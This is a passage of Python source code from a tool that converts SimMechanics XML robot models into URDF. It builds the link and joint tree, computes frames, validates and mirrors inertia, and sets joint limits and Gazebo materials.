joint configuration file load them\n\n\n # if the joint is revolute but no limits are defined, switch to continuous\n if 'limits' not in joint.keys() and joint['type'] == \"revolute\":\n joint['type'] = \"continuous\";\n\n self.joints[uid] = joint\n\n def buildTree(self, root):\n \"\"\"Reduce the graph structure of links and joints to a tree\n by breadth first search. Then construct new coordinate frames\n from new tree structure\"\"\"\n\n # resolve the undefined reference for all the joints\n for jid in self.joints:\n jointdict = self.joints[jid]\n if ('parent' not in jointdict.keys()):\n jointdict['parent'] = self.ref2nameMap[jointdict['ref_parent']]\n if ('child' not in jointdict.keys()):\n jointdict['child'] = self.ref2nameMap[jointdict['ref_child']]\n\n # Find the real rootLink\n if (jointdict['parent'].startswith('RootPart') and jointdict['type'] == 'fixed'):\n if (self.realRootLink is not None):\n pass\n # print(\"[WARN] multiple links attached to the RootPart, please open an issue with your model\")\n # print(\" at https://github.com/robotology-playground/simmechanics-to-urdf/issues/new\")\n else:\n self.realRootLink = self.getLinkNameByFrame(jointdict['child'])\n\n # Some postprocessing that was not possible to do while parsing\n for extraframe in self.extraframes:\n pid = extraframe['parentlink']\n # Some USERADDED frames could be attached to the dummy root RootPart\n # In this case substitute the dummy root with the real first link\n # attached to the RootPart with a fixed link\n if pid == 'RootPart':\n extraframe['parentlink'] = self.realRootLink\n # notice that we can disregard the original parent frame\n # of the joint because it is a fixed joint\n\n # Add necessary information for any frame in the SimMechanics XML\n # file that we want to save to URDF. Given that URDF does not\n # have a frame concept at all, we are bound to create \"dummy\"\n # links and joints to express the notion of frames\n for extraframe in self.extraframes:\n pid = extraframe['parentlink']\n cid = extraframe['framename']\n\n joint_name = cid + \"_fixed_joint\";\n\n self.links[pid]['neighbors'].append(cid)\n self.links[pid]['jointmap'][cid] = joint_name\n self.links[cid]['neighbors'].append(pid)\n self.links[cid]['jointmap'][pid] = joint_name\n self.joints[joint_name] = {'name': joint_name, 'parent': pid + 'CS1', 'child': cid + 'CS1', 'type': 'fixed'}\n # for (k,v) in extraframe['attributes'].items():\n # self.links[cid][k] = v\n\n # Create a list of all neighboring links at each link\n for jid in self.joints:\n jointdict = self.joints[jid]\n if \"Root\" in jointdict['name']:\n continue\n pid = self.getLinkNameByFrame(jointdict['parent'])\n cid = self.getLinkNameByFrame(jointdict['child'])\n parent = self.links[pid]\n child = self.links[cid]\n\n parent['neighbors'].append(cid)\n parent['jointmap'][cid] = jid\n child['neighbors'].append(pid)\n child['jointmap'][pid] = jid\n\n # import pprint\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(self.joints)\n\n\n # Add necessary information for any user-defined joints\n for (name, extrajoint) in self.extrajoints.items():\n pid = extrajoint['pid']\n cid = extrajoint['cid']\n jorigin = extrajoint['jorigin']\n newframe = name + \"_frame\"\n\n self.links[pid]['neighbors'].append(cid)\n self.links[pid]['jointmap'][cid] = name\n self.links[cid]['neighbors'].append(pid)\n self.links[cid]['jointmap'][pid] = name\n self.joints[name] = {'name': name, 'parent': jorigin, 'child': newframe}\n for (k, v) in extrajoint['attributes'].items():\n self.joints[name][k] = v\n self.frames[jorigin] = {'parent': pid}\n self.frames[newframe] = {'parent': cid}\n\n # Starting with designated root node, perform BFS to\n # create the tree\n queue = [root]\n self.links[root]['parent'] = \"GROUND\"\n while len(queue) > 0:\n id = queue.pop(0)\n link = self.links[id]\n for n in link['neighbors']:\n nbor = self.links[n]\n # if a neighbor has not been visited yet,\n # add it as a child node\n if not 'parent' in nbor:\n nbor['parent'] = id\n queue.append(n)\n link['children'].append(n)\n\n # build new link coordinate frames\n # URDF has the unconvenient requirement that the link frame\n # origin should be placed in the axis of the parent joint,\n # so we have to place special care in\n for id in self.links:\n\n link = self.links[id]\n if not 'parent' in link:\n continue\n parentid = link['parent']\n jointIsNotFixed = True\n if parentid == \"GROUND\":\n ref = self.baseframe\n else:\n joint = self.joints[link['jointmap'][parentid]]\n ref = joint['parent']\n if (joint['type'] == 'fixed'):\n jointIsNotFixed = False\n # If a frame is not fixed, then the default link frame\n # has the orientation of the link \"CS1\" frame and the origin\n # of the joint.\n # However using the linkFrames options is possible to use an\n # USERADDED frame as the linkFrame. Given that the URDF enforces\n # the link frame origin to lay on the axis of parent joint, the USERADDED\n # frame is used unmodified only if its origin lays on joint axis.\n # If the USERADDED frame origin doesn't lay on the joint axis, an exception is thrown.\n if (jointIsNotFixed and not (parentid == \"GROUND\")):\n if (self.linkFramesMap.get(link['uid']) is None):\n # no frame redefinition\n (off1, rot1) = self.tfman.get(WORLD, ref)\n (off2, rot2) = self.tfman.get(WORLD, id + \"CS1\")\n self.tfman.add(off1, rot2, WORLD, \"X\" + id)\n else:\n # using a useradded frame\n new_link_frame_fid = self.linkNameDisplayName2fid[(\n self.linkFramesMap[link['uid']][\"frameReferenceLink\"],\n self.linkFramesMap[link['uid']][\"frameName\"])];\n (new_link_frame_off, new_link_frame_rot) = self.tfman.get(WORLD, new_link_frame_fid)\n (joint_offset, joint_rot) = self.tfman.get(WORLD, ref)\n # get axis for the parent joint\n jointdict = self.joints[link['jointmap'][parentid]]\n jointdict_axis = jointdict['axis'];\n axis_string = jointdict_axis.replace(',', ' ')\n axis = [float(axis_el) for axis_el in axis_string.split()]\n\n axis_np = numpy.array(axis)\n joint_offset_np = numpy.array(joint_offset)\n new_link_frame_off_np = numpy.array(new_link_frame_off);\n\n axis_normalized = axis_np / numpy.linalg.norm(axis_np);\n\n # Check that the USERADDED frame origin lays on the joint axis\n joint_frame_to_new_link_frame_vector = new_link_frame_off_np - joint_offset_np;\n cross_axis_vector = numpy.cross(joint_frame_to_new_link_frame_vector, axis_normalized);\n if (numpy.any(numpy.absolute(cross_axis_vector) > _EPS)):\n raise Exception('The frame: ', self.linkFramesMap[link['uid']][\"frameName\"],\n ' doesn t lay on the joint axis.')\n\n self.tfman.add(new_link_frame_off, new_link_frame_rot, WORLD, \"X\" + id)\n\n else:\n # If the parent joint is fixed, the URDF format does not\n # default we use enforce any constraint on the frame placement\n # and we use the id+\"CS1\" frame as the link frame.\n # The frame of the link attached with a fixed joint\n # can be optionally set to a USERADDED frame using the\n # linkFrames options\n if (link['uid'] in self.linkFramesMap.keys()):\n new_link_frame_fid = self.linkNameDisplayName2fid[(\n self.linkFramesMap[link['uid']][\"frameReferenceLink\"],\n self.linkFramesMap[link['uid']][\"frameName\"])];\n (off, rot) = self.tfman.get(WORLD, new_link_frame_fid)\n self.tfman.add(off, rot, WORLD, \"X\" + id)\n else:\n if (parentid == \"GROUND\"):\n # be consistent with the old behaviour\n (off1, rot1) = self.tfman.get(WORLD, ref)\n (off2, rot2) = self.tfman.get(WORLD, id + \"CS1\")\n self.tfman.add(off1, rot2, WORLD, \"X\" + id)\n else:\n # If nothing special happens, use CS1 as link frame\n (off, rot) = self.tfman.get(WORLD, id + \"CS1\")\n self.tfman.add(off, rot, WORLD, \"X\" + id)\n\n def output(self, rootid):\n \"\"\"Creates the URDF from the parsed document.\n Makes the document and starts the recursive build process\"\"\"\n self.result = urdf_parser_py.urdf.URDF(self.name)\n self.outputLink(rootid)\n self.processLink(rootid)\n\n def processLink(self, id):\n \"\"\" Creates the output for the specified node's\n child links, the connecting joints, then\n recursively processes each child \"\"\"\n link = self.links[id]\n for cid in link['children']:\n jid = link['jointmap'][cid]\n\n self.outputLink(cid)\n self.outputJoint(jid, id)\n self.processLink(cid)\n\n def isValidURDFInertia(self, inertia, tol):\n inertiaMatrix = numpy.zeros([3, 3]);\n inertiaMatrix[0, 0] = inertia.ixx;\n inertiaMatrix[0, 1] = inertia.ixy;\n inertiaMatrix[0, 2] = inertia.ixz;\n inertiaMatrix[1, 0] = inertia.ixy;\n inertiaMatrix[1, 1] = inertia.iyy;\n inertiaMatrix[1, 2] = inertia.iyz;\n inertiaMatrix[2, 0] = inertia.ixz;\n inertiaMatrix[2, 1] = inertia.iyz;\n inertiaMatrix[2, 2] = inertia.izz;\n\n return self.isValidInertiaMatrix(inertiaMatrix, tol);\n\n def isValidInertiaMatrix(self, inertia, tol):\n \"\"\"Check that a matrix is a valid inertia matrix:\n * Check simmetry\n * Check positive definitess\n * Check triangular inequality of eigen values\"\"\"\n # Check simmetry\n deter = numpy.linalg.det(inertia)\n if (abs((inertia[0, 1] - inertia[1, 0]) / deter) > tol or\n abs((inertia[0, 2] - inertia[2, 0]) / deter) > tol or\n abs((inertia[1, 2] - inertia[2, 1]) / deter) > tol):\n sys.stderr.write(\n \"Inertia: \" + str(inertia) + \" is not a valid Inertia matrix because it is not simmetric.\\n\");\n return False;\n\n # Compute eigenvalues\n [s, v] = numpy.linalg.eig(inertia)\n if ((s[0]) / deter < tol or\n (s[1]) / deter < tol or\n (s[2]) / deter < tol):\n sys.stderr.write(\"Inertia: \" + str(\n inertia) + \" is not a valid Inertia matrix because it has negative inertias on the principal axis.\\n\");\n return False;\n\n # Check triangle inequality\n if (((s[0] + s[1] - s[2]) / deter < tol) or\n ((s[1] + s[2] - s[0]) / deter < tol) or\n ((s[0] + s[2] - s[1]) / deter < tol)):\n sys.stderr.write(\"Inertia: \" + str(\n inertia) + \" is not a valid Inertia matrix because it does not respect the triangle inequality.\\n\");\n return False;\n\n return True;\n\n def isValidSensor(self, sensorType):\n \"\"\" Checks if the specified sensor type is supported \"\"\"\n\n self.sensorIsValid = sensorType in SENSOR_TYPES\n if not self.sensorIsValid:\n raise TypeError('The sensor type ', sensorType, 'specified in the *.yaml file, is not supported.')\n\n def isValidGeometricShape(self, geometricShapeData):\n \"\"\" Checks if the specified Geometric shape is supported and correctly defined \"\"\"\n\n geometricShape = geometricShapeData[\"geometricShape\"]\n shape = geometricShape[\"shape\"]\n supportedShapes = GEOMETRIC_SHAPES.keys()\n geometricShapeIsValid = shape in supportedShapes\n if not geometricShapeIsValid:\n sys.stderr.write(\"Shape: '\" + shape + \"' is not supported.\\n\");\n sys.stderr.write(\"The following shapes are supported: \" + ','.join(supportedShapes) + \".\\n\");\n return False;\n\n geometricShapeIsCorrectlyDefined = True\n shapeRequiredParameters = GEOMETRIC_SHAPES[shape]\n for parameter in shapeRequiredParameters:\n geometricShapeIsCorrectlyDefined = geometricShapeIsCorrectlyDefined and (parameter in geometricShape.keys())\n if not geometricShapeIsCorrectlyDefined:\n sys.stderr.write(\"The parameters of the shape: '\" + shape + \"' are not correctly defined.\\n\");\n sys.stderr.write(\"The following parameters are required: \" + ','.join(shapeRequiredParameters) + \".\\n\");\n return False;\n\n return True\n\n def outputLink(self, id):\n \"\"\" Creates the URDF output for a single link \"\"\"\n\n linkdict = self.links[id]\n if linkdict['name'] == \"RootPart\":\n return\n\n if ('geometryFileName' in linkdict.keys()):\n ##############################################################\n ### Define Geometry (if this is not a fake link, i.e. a frame)\n ##############################################################\n visual = urdf_parser_py.urdf.Visual()\n collision = urdf_parser_py.urdf.Collision()\n\n filename = linkdict['geometryFileName']\n if self.forcelowercase:\n filename = filename.lower()\n\n if self.stringToRemoveFromMeshFileName:\n filename = filename.replace(self.stringToRemoveFromMeshFileName, '')\n\n if (self.filenameformat is not None):\n filename = self.filenameformat % filename\n else:\n filenameNoExt = os.path.splitext(filename)[0]\n filename = self.filenameformatchangeext % filenameNoExt\n\n visual.geometry = urdf_parser_py.urdf.Mesh(filename, self.scale)\n\n # Visual offset is difference between origin and CS1\n (off, rot) = self.tfman.get(\"X\" + id, id + \"CS1\")\n rpy = list(euler_from_quaternion(rot))\n visual.origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n\n if (id in self.assignedCollisionGeometry):\n # in this case the mesh will not be used as the\n # collision geometry. Instead, a simple shape will\n # be used.\n geometricShapeData = self.assignedCollisionGeometry[id]\n assert (self.isValidGeometricShape(geometricShapeData))\n geometricShape = geometricShapeData[\"geometricShape\"]\n collisionOriginVector = [float(scale_el) for scale_el in geometricShape[\"origin\"].split()]\n collisionOrigin = urdf_parser_py.urdf.Pose(collisionOriginVector[0:3], collisionOriginVector[3:6])\n collisionGeometry = self.createGeometry(geometricShape)\n\n collision.origin = collisionOrigin\n collision.geometry = collisionGeometry\n else:\n collision.geometry = visual.geometry\n collision.origin = visual.origin\n\n # Define Material\n visual.material = urdf_parser_py.urdf.Material()\n # Use specified color, if exists. Otherwise, get random color\n if id in self.assignedColors.keys():\n cname = \"%s_color\" % id\n (r, g, b, a) = self.assignedColors[id]\n elif 'color' in linkdict:\n cname = \"%s_color\" % id\n (r, g, b, a) = linkdict['color']\n else:\n (cname, (r, g, b, a)) = self.getColor(linkdict['name'])\n\n visual.material.name = cname\n visual.material.color = urdf_parser_py.urdf.Color(r, g, b, a)\n\n # Create a new gazebo blob for applying colors in the sdf\n gzblobmaterial_el = lxml.etree.Element(\"gazebo\", reference=id)\n gzvisual_el = lxml.etree.SubElement(gzblobmaterial_el, \"visual\")\n gzmaterial_el = lxml.etree.SubElement(gzvisual_el, \"material\")\n\n # Use specified comonents if they exist\n if 'ambient' in linkdict:\n ambient_const = linkdict['ambient']\n ambient_el = lxml.etree.SubElement(gzmaterial_el, \"ambient\")\n ambient_el.text = str(r * ambient_const) + \" \" + str(g * ambient_const) + \" \" + str(\n b * ambient_const) + \" \" + str(a);\n\n if 'diffuse' in linkdict:\n diffuse_const = linkdict['diffuse']\n diffuse_el = lxml.etree.SubElement(gzmaterial_el, \"diffuse\")\n diffuse_el.text = str(r * diffuse_const) + \" \" + str(g * diffuse_const) + \" \" + str(\n b * diffuse_const) + \" \" + str(a);\n\n if 'specular' in linkdict:\n specular_const = linkdict['specular']\n specular_el = lxml.etree.SubElement(gzmaterial_el, \"specular\")\n specular_el.text = str(r * specular_const) + \" \" + str(g * specular_const) + \" \" + str(\n b * specular_const) + \" \" + str(a);\n\n if 'emission' in linkdict:\n emission_const = linkdict['emission']\n emission_el = lxml.etree.SubElement(gzmaterial_el, \"emission\")\n emission_el.text = str(r * emission_const) + \" \" + str(g * emission_const) + \" \" + str(\n b * emission_const) + \" \" + str(a);\n\n # Add the blob only if there is a child inside <gazebo><visual><material>\n if len(gzmaterial_el.getchildren()) > 0:\n addXMLBlob(gzblobmaterial_el, self.XMLBlobs)\n\n else:\n visual = None\n collision = None\n\n ##############################################################\n ### Define Inertial Frame and inertia informations (if this is not a fake link, i.e. a frame)\n ##############################################################\n if ('mass' in linkdict.keys()):\n\n inertial = urdf_parser_py.urdf.Inertial()\n\n if (id not in self.mirroredInertiaMap):\n # usual: get inertia informations from SimMechanics XML\n units = linkdict['massUnits']\n massval = convert(float(linkdict['mass']), units)\n inertial.mass = massval\n\n # we check if a mass different from the one present in\n # the SimMechanics file is assigned for this link in the\n # yaml file\n inertiaScaling = 1.0;\n\n if (id in self.assignedMasses):\n # if it is, we have to change the mass and scale\n # the inertia by multiplyng by new_mass/old_mass\n # (the COM instead don't need any modification)\n oldMass = inertial.mass;\n newMass = self.assignedMasses[id];\n inertial.mass = newMass;\n inertiaScaling = newMass / oldMass;\n\n matrix = getlist(linkdict[\"inertia\"])\n\n units = linkdict['inertiaUnits']\n\n for i in range(0, len(matrix)):\n matrix[i] = convert(matrix[i], units)\n\n inertial.inertia = urdf_parser_py.urdf.Inertia()\n inertial.inertia.ixx = inertiaScaling * matrix[0]\n inertial.inertia.ixy = inertiaScaling * matrix[1]\n inertial.inertia.ixz = inertiaScaling * matrix[2]\n inertial.inertia.iyy = inertiaScaling * matrix[4]\n inertial.inertia.iyz = inertiaScaling * matrix[5]\n inertial.inertia.izz = inertiaScaling * matrix[8]\n\n if (id in self.assignedInertiasMap):\n # depending on the assigned inertia, we have to modify\n # some values of the inertia matrix. We will check the\n # resulting inertia to make sure that the inertia matrix\n # is still physically consistent\n if ('xx' in self.assignedInertiasMap[id]):\n inertial.inertia.ixx = self.assignedInertiasMap[id]['xx']\n if ('yy' in self.assignedInertiasMap[id]):\n inertial.inertia.iyy = self.assignedInertiasMap[id]['yy']\n if ('zz' in self.assignedInertiasMap[id]):\n inertial.inertia.izz = self.assignedInertiasMap[id]['zz']\n\n if (not self.isValidURDFInertia(inertial.inertia, 1e-3)):\n sys.stderr.write(\"Warning: inertia matrix for link \" + id + \" is not physically consistent.\\n\");\n\n # Inertial origin is the center of gravity\n (off, rot) = self.tfman.get(\"X\" + id, id + \"CG\")\n # print(\"X\"+id+\" to \"+id+\"CG:\")\n # print(off)\n # print(rot)\n rpy = list(euler_from_quaternion(rot))\n\n inertial.origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n else:\n # if link is mirroredInertia, we should not trust the inertial infromation\n # provided by SimMechanics XML because it could be buggy. We will mirror\n # the inertia information of another link instead\n mirroredLink = id\n originalLink = self.mirroredInertiaMap[mirroredLink][\"originalLink\"];\n simmetryReferenceLink = self.mirroredInertiaMap[mirroredLink][\"simmetryReferenceLink\"];\n symmetryPlane = self.mirroredInertiaMap[mirroredLink][\"symmetryPlane\"]\n\n if (not (symmetryPlane == \"xz\")):\n print(\n \"simmechanics_to_urdf: only xz symmetryPlane is supported, please file an issue at https://github.com/robotology-playground/simmechanics-to-urdf/issues/new to get more symmetryPlane supported.\");\n assert (False);\n\n originalLinkDict = self.links[originalLink]\n\n # Mass: the mass is simply copied by the original link\n units = originalLinkDict['massUnits']\n massval = convert(float(originalLinkDict['mass']), units)\n inertial.mass = massval\n\n # COM: we have to express the COM in simmetryReferenceLink,\n # mirror it and then express it in mirroredLink frame\n # T is a 4x4 homogeneous matrix\n # Get {}^simmetryReferenceLink COM\n (off, rot) = self.tfman.get(\"X\" + simmetryReferenceLink, originalLink + \"CG\")\n simmetryRefenceLink_COM = numpy.zeros(4)\n simmetryRefenceLink_COM[0] = off[0]\n simmetryRefenceLink_COM[1] = off[1]\n simmetryRefenceLink_COM[2] = off[2]\n simmetryRefenceLink_COM[3] = 1;\n\n # Get {}^mirroredLink T_simmetryReferenceLink\n mirroredLink_T_simmetryReferenceLink = self.tfman.getHomTransform(\"X\" + mirroredLink,\n \"X\" + simmetryReferenceLink)\n\n # xz simmetry : y --> -y\n simmetryRefenceLink_COM[1] = -simmetryRefenceLink_COM[1];\n\n # {}^mirroredLink COM = {}^mirroredLink T_simmetryReferenceLink {}^simmetryReferenceLink COM\n mirroredLink_COM = numpy.dot(mirroredLink_T_simmetryReferenceLink, simmetryRefenceLink_COM);\n\n off = [0.0, 0.0, 0.0];\n off[0] = mirroredLink_COM[0];\n off[1] = mirroredLink_COM[1];\n off[2] = mirroredLink_COM[2];\n\n # Inertia: the inertia both in SimMechanics XML and URDF\n # is expressed in the COM, so we have only to ensure that the\n # change the orientation of inertia to match the one of the\n # simmetryReferenceLink and change the sign of\n # relevant off diagonal elements (in xz case all the offdiagonal elements related to y)\n # after that we can express the inertia in the frame that we prefer, for example we can leave\n # it in the simmetryReferenceLink, a long as we set the right pose in the inertial tag\n\n # Get {}^originalLinkInertiaFrame R_simmetryReferenceLink\n originalLinkInertiaFrame_T_simmetryReferenceLink = self.tfman.getHomTransform(originalLink + \"CG\",\n \"X\" + simmetryReferenceLink)\n originalLinkInertiaFrame_R_simmetryReferenceLink = originalLinkInertiaFrame_T_simmetryReferenceLink[0:3,\n 0:3];\n\n # Get {}^simmetryReferenceLink R_originalLinkInertiaFrame\n simmetryReferenceLink_T_originalLinkInertiaFrame = self.tfman.getHomTransform(\n \"X\" + simmetryReferenceLink, originalLink + \"CG\")\n simmetryReferenceLink_R_originalLinkInertiaFrame = simmetryReferenceLink_T_originalLinkInertiaFrame[0:3,\n 0:3];\n\n # Get {}^originalLinkInertiaFrame Inertia3D\n matrix = getlist(originalLinkDict[\"inertia\"])\n\n units = originalLinkDict['inertiaUnits']\n for i in range(0, len(matrix)):\n matrix[i] = convert(matrix[i], units)\n\n originalLinkInertiaFrame_Inertia = numpy.reshape(numpy.array(matrix), [3, 3])\n\n assert (self.isValidInertiaMatrix(originalLinkInertiaFrame_Inertia, 1e-3));\n # {}^simmetryReferenceLink Inertia3D = {}^simmetryReferenceLink R_originalLink * {}^originalLink Inertia3D * {}^originalLink R_simmetryReferenceLink\n # sys.stderr.write(\"simmetryReferenceLink_R_originalLinkInertiaFrame: \" + str(simmetryReferenceLink_R_originalLinkInertiaFrame.shape) +\"\\n\");\n # sys.stderr.write(\"originalLinkInertiaFrame_Inertia: \" + str(originalLinkInertiaFrame_Inertia.shape) +\"\\n\");\n # sys.stderr.write(\"originalLinkInertiaFrame_R_simmetryReferenceLink: \" + str(originalLinkInertiaFrame_R_simmetryReferenceLink.shape) +\"\\n\");\n simmetryReferenceLink_Inertia = numpy.dot(simmetryReferenceLink_R_originalLinkInertiaFrame,\n numpy.dot(originalLinkInertiaFrame_Inertia,\n originalLinkInertiaFrame_R_simmetryReferenceLink))\n\n assert (self.isValidInertiaMatrix(simmetryReferenceLink_Inertia, 1e-3));\n\n # xz simmetry: Ixy --> -Ixy , Iyz ---> -Iyz\n simmetryReferenceLink_Inertia[0, 1] = -simmetryReferenceLink_Inertia[0, 1];\n simmetryReferenceLink_Inertia[1, 0] = -simmetryReferenceLink_Inertia[1, 0];\n simmetryReferenceLink_Inertia[1, 2] = -simmetryReferenceLink_Inertia[1, 2];\n simmetryReferenceLink_Inertia[2, 1] = -simmetryReferenceLink_Inertia[2, 1];\n\n assert (self.isValidInertiaMatrix(simmetryReferenceLink_Inertia, 1e-3));\n\n # The inertia orientation is now the one of R_simmetryReferenceLink, so we have to put in urdf pose {}^mirroredLink R_simmetryReferenceLink\n (off_dummy, rot) = self.tfman.get(\"X\" + mirroredLink, \"X\" + simmetryReferenceLink)\n\n rpy = list(euler_from_quaternion(rot))\n\n # Save inertia matrix\n # sys.stderr.write(\"Inertia RPY of link \" + str(id) + \"is \" + str(rpy) + \"\\n\");\n # sys.stderr.write(\"Inertia matrix of link \" + str(id) + \"is \" + str(simmetryReferenceLink_Inertia) + \"\\n\");\n inertial.inertia = urdf_parser_py.urdf.Inertia()\n inertial.inertia.ixx = simmetryReferenceLink_Inertia[0, 0];\n inertial.inertia.ixy = simmetryReferenceLink_Inertia[0, 1];\n inertial.inertia.ixz = simmetryReferenceLink_Inertia[0, 2];\n inertial.inertia.iyy = simmetryReferenceLink_Inertia[1, 1];\n inertial.inertia.iyz = simmetryReferenceLink_Inertia[1, 2]\n inertial.inertia.izz = simmetryReferenceLink_Inertia[2, 2];\n\n # Save COM and Inertia orientation\n inertial.origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n\n # Save also Inertial frame in tfman for consistency\n self.tfman.add(zero(off), rot, \"X\" + mirroredLink, mirroredLink + \"CG\")\n else:\n inertial = None\n\n ### add the link\n link = urdf_parser_py.urdf.Link(id, visual, inertial, collision)\n\n self.result.add_link(link)\n\n def getColor(self, s):\n \"\"\" Gets a two element list containing a color name,\n and it's rgba. The color selected is based on the mesh name.\n If already seen, returns the saved color\n Otherwise, returns the next available color\"\"\"\n if s in self.colormap:\n return self.colormap[s]\n color = COLORS[self.colorindex]\n self.colormap[s] = color\n self.colorindex = (self.colorindex + 1) % len(COLORS)\n return color\n\n def createGeometry(self, geometricShape):\n \"\"\" Gets an object containing the data to build the geometric shape\"\"\"\n\n shape = geometricShape[\"shape\"]\n if shape == \"sphere\":\n radius = geometricShape[\"radius\"]\n geometry = urdf_parser_py.urdf.Sphere(radius)\n elif shape == \"box\":\n size = geometricShape[\"size\"]\n sizeVector = [float(size_el) for size_el in size.split()]\n geometry = urdf_parser_py.urdf.Box(sizeVector)\n elif shape == \"cylinder\":\n radius = geometricShape[\"radius\"]\n length = geometricShape[\"length\"]\n geometry = urdf_parser_py.urdf.Cylinder(radius, length)\n\n return geometry\n\n def outputJoint(self, id, parentname):\n \"\"\" Outputs URDF for a single joint \"\"\"\n jointdict = self.joints[id]\n\n if \"Root\" in jointdict['name']:\n return\n\n pid = self.getLinkNameByFrame(jointdict['parent'])\n cid = self.getLinkNameByFrame(jointdict['child'])\n\n # If the original joint was reversed while building the tree,\n # swap the two ids\n if parentname != pid:\n cid = pid\n pid = parentname\n\n # Define joint type\n jtype = jointdict['type']\n\n limits = None\n axis = None\n\n if 'limits' in jointdict:\n limits = urdf_parser_py.urdf.JointLimit(None, None)\n for (k, v) in jointdict['limits'].items():\n setattr(limits, k, v)\n if (jtype == \"continuous\"):\n jtype = \"revolute\";\n else:\n # if present, load limits from csv joint configuration file\n # note: angle in csv joints configuration file angles are represented as DEGREES\n if (id in self.joint_configuration):\n conf = self.joint_configuration[id]\n if ((\"upper_limit\" in conf) or\n (\"lower_limit\" in conf) or\n (\"velocity_limit\" in conf) or\n (\"effort_limit\" in conf)):\n limits = urdf_parser_py.urdf.JointLimit()\n if (\"upper_limit\" in conf and conf.get(\"upper_limit\") != \"\"):\n if (jtype == \"prismatic\"):\n limits.upper = float(conf.get(\"upper_limit\"))\n else:\n limits.upper = math.radians(float(conf.get(\"upper_limit\")))\n if (\"lower_limit\" in conf and conf.get(\"lower_limit\") != \"\"):\n if (jtype == \"prismatic\"):\n limits.lower = float(conf.get(\"lower_limit\"))\n else:\n limits.lower = math.radians(float(conf.get(\"lower_limit\")))\n if (\"velocity_limit\" in conf and conf.get(\"velocity_limit\") != \"\"):\n limits.velocity = float(conf.get(\"velocity_limit\"))\n else:\n limits.velocity = self.velocity_limit_fallback\n if (\"effort_limit\" in conf and conf.get(\"effort_limit\") != \"\"):\n limits.effort = float(conf.get(\"effort_limit\"))\n else:\n limits.effort = self.effort_limit_fallback\n # if adding limits, switching the joint type to revolute\n if (jtype == \"continuous\" and\n conf.get(\"upper_limit\") != \"\" and\n conf.get(\"lower_limit\") != \"\"):\n jtype = \"revolute\";\n else:\n # if not limits are defined for a prismatic joint, define them\n # TODO: can we remove this part?\n if (jtype == \"prismatic\"):\n limits = urdf_parser_py.urdf.JointLimit()\n limits.upper = 10000\n limits.lower = -10000\n limits.velocity = 10000\n limits.effort = 10000\n\n # add axis: the axis is expressed in the axisReferenceFrame (normally WORLD)\n # while in the URDF we have to express it in the child frame\n # we have then to properly rotate it.\n if 'axis' in jointdict and jtype != 'fixed':\n axis_string = jointdict['axis'].replace(',', ' ')\n\n # print(\"axis string \" + str(axis_string))\n axis = [float(axis_el) for axis_el in axis_string.split()]\n # print(\"axis \" + str(axis))\n if (id in self.reverseRotationAxis):\n for i in range(0, 3):\n axis[i] = -axis[i]\n\n axis_np = numpy.array(axis)\n\n child_H_axisReferenceFrame = self.tfman.getHomTransform(\"X\" + cid, jointdict['axisReferenceFrame']);\n\n axis_child = numpy.dot(child_H_axisReferenceFrame[0:3, 0:3], axis_np);\n\n for i in range(0, 3):\n axis[i] = axis_child[i];\n\n # Define the origin\n (off, rot) = self.tfman.get(\"X\" + pid, \"X\" + cid)\n rpy = list(euler_from_quaternion(rot))\n origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n\n # adding damping and friction (not from simmechanics but from configuration file)\n joint_damping = self.damping_fallback;\n joint_friction = self.friction_fallback;\n if (id in self.joint_configuration):\n conf = self.joint_configuration[id]\n if \"damping\" in conf:\n joint_damping = float(conf[\"damping\"])\n if \"friction\" in conf:\n joint_friction = float(conf[\"friction\"])\n joint_dynamics = urdf_parser_py.urdf.JointDynamics(damping=joint_damping, friction=joint_friction)\n\n joint = urdf_parser_py.urdf.Joint(id, pid, cid, jtype, limit=limits, axis=axis, origin=origin,\n dynamics=joint_dynamics)\n self.result.add_joint(joint)\n\n def getName(self, basename):\n \"\"\"Return a unique name of the format\n basenameD* where D is the lowest number\n to make the name unique (if the basename is already unique, no number will be added).\n If a rule for renaming basename is defined in the configuration file, the basename\n will be changed.\"\"\"\n index = 0\n if basename in self.rename:\n basename = self.rename[basename]\n name = basename\n while name in self.names:\n name = basename + str(index)\n index = index + 1\n self.names[name] = 1\n return name\n\n def getLinkNameByFrame(self, key):\n \"\"\"Gets the link name from the frame object\"\"\"\n return self.frames[key]['parent']\n\n def graph(self):\n \"\"\"For debugging purposes, output a graphviz\n representation of the tree structure, noting\n which joints have been reversed and which have\n been removed\"\"\"\n graph = \"digraph proe {\\n\"\n for jkey in self.joints:\n joint = self.joints[jkey]\n pref = joint['parent']\n cref = joint['child']\n # label = pref + \":\" + cref\n label = joint['name']\n pkey = self.getLinkNameByFrame(pref)\n ckey = self.getLinkNameByFrame(cref)\n case = 'std'\n if pkey != \"GROUND\":\n parent = self.links[pkey]\n if not ckey in parent['children']:\n child = self.links[ckey]\n if pkey in child['children']:\n case = 'rev'\n else:\n case = 'not'\n pkey = pkey.replace(\"-\", \"_\")\n ckey = ckey.replace(\"-\", \"_\")\n\n if (case == 'std' or case == 'rev') and (joint['type'] != \"fixed\"):\n style = \" penwidth=\\\"5\\\"\"\n else:\n style = \"\";\n\n if case == 'std':\n s = pkey + \" -> \" + ckey + \" [ label = \\\"\" + label + \"\\\"\";\n elif case == 'not':\n s = pkey + \" -> \" + ckey + \" [ label = \\\"\" + label + \"\\\" color=\\\"yellow\\\"\"\n elif case == 'rev':\n s = ckey + \" -> \" + pkey + \" [ label = \\\"\" + label + \"\\\" color=\\\"blue\\\"\"\n s = s + style + \"];\"\n\n if not \"Root\" in s and \"-> SCR_\" not in s:\n graph = graph + s + \"\\n\"\n return graph + \"}\\n\"\n\n def groups(self, root):\n \"\"\" For planning purposes, print out lists of\n all the links between the different joints\"\"\"\n self.groups = {}\n self.makeGroup(root, \"BASE\")\n s = \"\"\n for key in self.groups.keys():\n s = s + key + \":\\n\\t\"\n ids = self.groups[key]\n for id in ids:\n s = s + id + \" \"\n s = s + \"\\n\\n\"\n return s\n\n def makeGroup(self, id, gid):\n \"\"\" Helper function for recursively gathering\n groups of joints. \"\"\"\n if gid in self.groups:\n idlist = self.groups[gid]\n idlist.append(id)\n else:\n idlist = [id]\n self.groups[gid] = idlist\n link = self.links[id]\n for child in link['children']:\n jid = link['jointmap'][child]\n joint = self.joints[jid]\n if joint['type'] == 'weld':\n 